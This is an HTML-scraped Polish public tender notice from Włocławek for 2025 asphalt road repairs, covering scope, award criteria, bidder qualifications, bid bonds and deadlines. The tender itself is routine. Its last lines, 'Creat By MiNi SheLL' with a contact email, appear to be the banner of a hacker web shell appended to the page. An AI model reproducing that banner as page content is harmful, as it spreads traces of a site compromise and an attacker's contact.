skorzystania z opcji: </h3> Zamawiający zgodnie z treścią art. 441 ust. 1 ustawy pzp przewiduje możliwość zastosowania prawa opcji.<br/>1) Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji w wysokości do 30% ceny brutto za realizację zamówienia podstawowego.<br/>2) Prawo opcji dotyczy robót tożsamych z określonymi w umowie, na drodze będącej przedmiotem zamówienia lub na innej<br/>drodze wskazanej przez Zamawiającego.<br/>3) Roboty w ramach opcji będą realizowane na podstawie zlecenia opcji, bez konieczności zmiany umowy. Na okoliczność<br/>jego skorzystania zostanie wydane Wykonawcy polecenie jego realizacji. Do realizacji zastosowanie będą miały zapisy<br/>zawartej umowy;<br/>4) Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji niniejszej<br/>umowy. W przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy z tego tytułu nie przysługuje żadne<br/>roszczenie odszkodowawcze.<br/>5) Skorzystanie przez Zamawiającego z prawa opcji nastąpi w trakcie obowiązywania umowy na zamówienie podstawowe<br/>oraz przed wykorzystaniem środków, o których mowa w § 7 ust. 1 projektowanych postanowień umowy.<br/>6) Skorzystanie przez Zamawiającego z prawa opcji nastąpi po podjęciu Uchwały Rady Miasta Włocławek lub wydaniu<br/>przez Prezydenta Miasta Włocławek Zarządzenia w sprawie zmian w budżecie miasta Włocławek, skutkujących<br/>zwiększeniem środków finansowych dotyczących inwestycji drogowych realizowanych przez Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2 pn. „Remonty bitumiczne na terenie miasta Włocławek w roku 2025”<br/>Przedmiot zamówienia stanowią roboty budowlane, polegające na remontach nawierzchni bitumicznej dróg na terenie<br/>miasta Włocławek.<br/>Zakres:<br/>I. Roboty rozbiórkowe.<br/>1. Zakres robót objętych zamówieniem zawiera dokumentacja projektowa i przedmiar robót pozycje od 1 do 2.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Frezowanie nawierzchni bitumicznych wraz z oczyszczeniem i odwozem destruktu na składowisko Wykonawcy.<br/>3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ.<br/>II. Nawierzchnie.<br/>1. Zakres robót objętych zamówieniem zawiera dokumentacja projektowa i przedmiar robót pozycje od 3 do 7.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Mechaniczne oczyszczenie nawierzchni drogowych asfaltowych<br/>b) Skropienie nawierzchni ulepszonych bitumicznych emulsją asfaltową.<br/>c) Wykonanie nawierzchni z betonu asfaltowego, warstwa wiążąca, wyrównawcza AC16W dla ruchu ciężkiego, gr. 4 cm.<br/>d) Wykonanie nawierzchni z betonu asfaltowego, warstwa ścieralna AC11S dla ruchu ciężkiego, gr. 4 cm.<br/>e) Wykonanie nawierzchni z betonu asfaltowego, warstwa ścieralna AC11S dla ruchu ciężkiego, gr. 5 cm.<br/>3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ.<br/>III. Urządzenia infrastruktury podziemnej.<br/>1. Zakres robót objętych zamówieniem zawiera dokumentacja projektowa i przedmiar robót pozycje od 8 do 10.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Regulacja pionowa studzienek dla urządzeń podziemnych – wpustów ulicznych.<br/>b) Regulacja pionowa studzienek dla urządzeń podziemnych - włazów kanałowych.<br/>c) Regulacja pionowa studzienek dla urządzeń podziemnych – zasuw wodociągowych i gazowych<br/>3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ.<br/>IV. Oznakowanie poziome.<br/>1. Zakres robót objętych zamówieniem zawiera dokumentacja projektowa i przedmiar robót pozycja 11.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Wykonanie oznakowania poziomego grubowarstwowego.<br/>3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ.<br/>V. Inne roboty.<br/>1. Zakres robót objętych zamówieniem zawiera dokumentacja projektowa i przedmiar robót pozycje od 8 do 10.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Naprawa pętli indukcyjnych.<br/>b) Demontaż oraz ponowny montaż progów zwalniających wyspowych.<br/>Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 603739,74 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki udziału dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający odstąpił od określenia warunków udziału w postępowaniu w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający odstąpił od określenia warunków udziału w postępowaniu w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający odstąpił od określenia warunków udziału w postępowaniu w tym zakresie.<br/>4) zdolności technicznej lub zawodowej: Wykonawca spełni warunek jeżeli wykaże, że:<br/>Zadanie nr 1:<br/>a) dysponuje wymienionymi poniżej osobami przewidzianymi do realizacji zamówienia lub przedstawi pisemne<br/>zobowiązanie innych podmiotów do udostępnienia wymienionych poniżej osób, przewidzianych do realizacji zamówienia,<br/>które będą uczestniczyły w realizacji zamówienia i będą odpowiedzialne za kierowanie robotami budowlanymi, zgodnie z<br/>dyspozycją art. 12 ustawy z dnia 7 lipca 1994 roku – Prawo budowlane, Zamawiający dopuszcza uprawnienia wydane<br/>obywatelom państw Europejskiego Obszaru Go-spodarczego oraz Konfederacji Szwajcarskiej, zgodnie z ustawą z dnia 22<br/>grudnia 2015 roku o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej:<br/> kierownik budowy, który jednocześnie będzie pełnił funkcję kierownika robót branży drogowej – 1 osoba posiadająca ważne<br/>uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności inżynieryjnej drogowej,<br/>Zadanie nr 2:<br/>a) wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, co najmniej dwie roboty budowlane polegające na wykonaniu nawierzchni z mieszanki mineralnoasfaltowej<br/>o powierzchni min. 1500 m2 – każda robota budowlana;<br/>b) dysponuje wymienionymi poniżej osobami przewidzianymi do realizacji zamówienia lub przedstawi pisemne<br/>zobowiązanie innych podmiotów do udostępnienia wymienionych poniżej osób, przewidzianych do realizacji zamówienia,<br/>które będą uczestniczyły w realizacji zamówienia i będą odpowiedzialne za kierowanie robotami budowlanymi, zgodnie z<br/>dyspozycją art. 12 ustawy z dnia 7 lipca 1994 roku – Prawo budowlane, Zamawiający dopuszcza uprawnienia wydane<br/>obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, zgodnie z ustawą z dnia 22<br/>grudnia 2015 roku o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej:<br/> kierownik budowy, który jednocześnie będzie pełnił funkcję kierownika robót branży drogowej – 1 osoba posiadająca ważne<br/>uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności inżynieryjnej drogowej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie wykonawcy<br/>o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125<br/>ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego,<br/>o których mowa w:<br/>- art. 108 ust. 1 pkt 3 ustawy PZP,<br/>- art. 108 ust. 1 pkt 4 ustawy PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 ustawy PZP, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>- art. 108 ust. 1 pkt 6 ustawy PZP,<br/>- art. 109 ust. 1 pkt 1 ustawy PZP,<br/>b) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego,<br/>o których mowa w:<br/>- art. 108 ust. 1 pkt 1 i 2 ustawy PZP,<br/>- art. 109 ust. 1 pkt 4 ustawy PZP,<br/>c) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego,<br/>o których mowa w:<br/>- art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2025 r.,<br/>poz. 514);<br/>według wzoru z załącznika nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty – według wzoru stanowiącego załącznik nr 8 do SWZ (wyłącznie w przypadku składania<br/>oferty na zadanie nr 2),<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz in-formacją o podstawie do dysponowania tymi<br/>osobami – według wzoru stanowiącego załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz ofertowy, a w przypadku zadania nr 1 formularz ofertowy wraz z kosztorysem ofertowym, stanowiącym<br/>załącznik nr 1 do formularza ofertowego.<br/>2) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postepowaniu, składane<br/>na podstawie art. 125 ust. 1 ustawy PZP – wzór oświadczenia zawarto w załączniku nr 2a oraz 2b do SWZ,<br/>z zastrzeżeniem, że:<br/>a) w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców – oświadczenie, o którym mowa<br/>w ppkt. 2, składa każdy z Wykonawców, przy czym w części dotyczącej spełnienia warunków udziału<br/>w postępowaniu tylko w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu;<br/>b) w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby – Wykonawca wraz z<br/>oświadczeniem, o którym mowa w ppkt. 2, przedstawia także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby,<br/>3) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>4) w przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo<br/>do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia i/lub zawarcia<br/>umowy w sprawie zamówienia w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>5) dokument potwierdzający wniesienie wadium, jeżeli zamawiający żądał wniesienia wadium,<br/>6) w przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji podmiotów udostępniających zasoby –<br/>zobowiązanie podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia -<br/>według wzoru z załącznika nr 3 do SWZ – lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>7) w przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>w sytuacji, o której mowa w art. 117 ust. 2 i 3 ustawy PZP – wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy – według wzoru z załącznika nr 4 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest przed upływem terminu składania ofert wnieść wadium w wysokości:<br/>Zadanie nr 1: 7.500,00 PLN (słownie: siedem tysięcy pięćset złotych, 00/100).<br/>Zadanie nr 2: 6.000,00 PLN (słownie: sześć tysięcy złotych, 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania istotnych zmian umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, zgodnie z projektowanymi postanowieniami umowy, stanowiącymi załączniki nr 5a i 5b do<br/>SWZ oraz<br/>ustawą PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W prowadzonym postępowaniu Wykonawcy składają swoje oferty za pośrednictwem Platformy Przetargowej Urzędu Miasta Włocławek dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-16 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wykluczy z postępowania Wykonawcę na podstawie przesłanek wynikających z art. 7 ust. 1 ustawy z dnia<br/>13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. 2025 poz. 514).<br/>2. Przedmiotowe postępowanie o udzielenie zamówienia publicznego prowadzone jest przez Zamawiającego tj. Gmina<br/>Miasto Włocławek – Urząd Miasta Włocławek, na rzecz innego Zamawiającego, tj. Miejskiego Zarządu Dróg i Zieleni we<br/>Włocławku, ul. Zielna 13/21, 87-800 Włocławek, na podstawie Zarządzenia nr 89/2025 Prezydenta Miasta Włocławek z dnia<br/>7 marca 2025 roku w sprawie wyznaczenia zamawiającego do przeprowadzenia postępowań o udzielenie zamówienia<br/>publicznego dla jednostki organizacyjnej Gminy Miasto Włocławek, których wartość jest równa lub przekracza 130.000<br/>złotych, a także określenia sposobu współdziałania tej jednostki z zamawiającym.<br/>3. Dane podmiotu, na rzecz którego prowadzone jest przedmiotowe postępowanie:<br/>1) nazwa podmiotu prowadzącego postępowanie: Miejski Zarząd Dróg i Zieleni we Włocławku,<br/>2) Krajowy Numer Identyfikacyjny: REGON 384814038<br/>3) adres:<br/>- ulica: Zielna 13/21,<br/>- miejscowość: Włocławek,<br/>- kod pocztowy: 87-800,<br/>- województwo: kujawsko-pomorskie,<br/>- kraj: Polska,<br/>- lokalizacja NUTS 3: PL619 - Włocławski,<br/>- numer telefonu: +48 (54) 411 64 54,<br/>- adres poczty elektronicznej: biuro@mzdiz.pl,<br/>- adres strony internetowej: https://mzdiz.pl/.

Creat By MiNi SheLL
Email: jattceo@gmail.com